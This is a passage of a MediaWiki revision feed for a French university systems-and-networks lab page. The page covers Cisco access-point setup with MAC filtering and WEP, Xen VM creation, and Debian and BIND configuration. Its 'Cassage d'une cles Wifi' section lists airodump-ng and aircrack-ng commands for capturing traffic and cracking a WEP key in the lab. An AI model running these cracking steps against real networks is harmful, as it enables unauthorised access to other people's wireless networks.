PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Serveur DNS&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nano /etc/bind/named.conf.options &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   59  apt-get install vim strace tcpdump &lt;br /&gt;
   60  apt-get install host&lt;br /&gt;
   61  host -t ni love-in-the-world.space&lt;br /&gt;
   62  host -t any love-in-the-world.space&lt;br /&gt;
   68  vim named.conf.options &lt;br /&gt;
   69  cp db.local db.love-in-the-world&lt;br /&gt;
   70  cat named.conf.default-zones &lt;br /&gt;
   71  vim named.conf.local &lt;br /&gt;
   73  vim db.love-in-the-world &lt;br /&gt;
   service bind9 stop&lt;br /&gt;
   76  service bind9 start&lt;br /&gt;
   77  cat /var/log/daemon.log&lt;br /&gt;
   78  vim db.love-in-the-world &lt;br /&gt;
   service bind9 stop&lt;br /&gt;
   vim db.love-in-the-world &lt;br /&gt;
   service bind9 start&lt;br /&gt;
   cat /var/log/daemon.log&lt;br /&gt;
   cat /var/log/daemon.log&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie III - Installation de Debian sur les nouvelles machines &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie IV - Cassage d'une cles Wifi &amp;lt;/h2&amp;gt;&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Préparation &amp;lt;/h4&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;b) Cassage d'une cles WEP &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseax Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w fcracotte06&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls&lt;br /&gt;
aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;c) Cassage d'une cles WPA&amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23079</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23079"/>
				<updated>2015-11-20T07:34:52Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h5&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Serveur DNS&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nano /etc/bind/named.conf.options &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   59  apt-get install vim strace tcpdump &lt;br /&gt;
   60  apt-get install host&lt;br /&gt;
   61  host -t ni love-in-the-world.space&lt;br /&gt;
   62  host -t any love-in-the-world.space&lt;br /&gt;
   68  vim named.conf.options &lt;br /&gt;
   69  cp db.local db.love-in-the-world&lt;br /&gt;
   70  cat named.conf.default-zones &lt;br /&gt;
   71  vim named.conf.local &lt;br /&gt;
   73  vim db.love-in-the-world &lt;br /&gt;
   service bind9 stop&lt;br /&gt;
   76  service bind9 start&lt;br /&gt;
   77  cat /var/log/daemon.log&lt;br /&gt;
   78  vim db.love-in-the-world &lt;br /&gt;
   service bind9 stop&lt;br /&gt;
   vim db.love-in-the-world &lt;br /&gt;
   service bind9 start&lt;br /&gt;
   cat /var/log/daemon.log&lt;br /&gt;
   cat /var/log/daemon.log&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie III - Installation de Debian sur les nouvelles machines &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie IV - Cassage d'une cles Wifi &amp;lt;/h2&amp;gt;&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Préparation &amp;lt;/h4&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;b) Cassage d'une cles WEP &amp;lt;/h4&amp;gt;&lt;br /&gt;
&amp;lt;h4&amp;gt;c) Cassage d'une cles WPA&amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22776</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22776"/>
				<updated>2015-11-06T11:36:22Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h5&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
on se connecte a notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage &lt;br /&gt;
apt-get purge systemd&lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
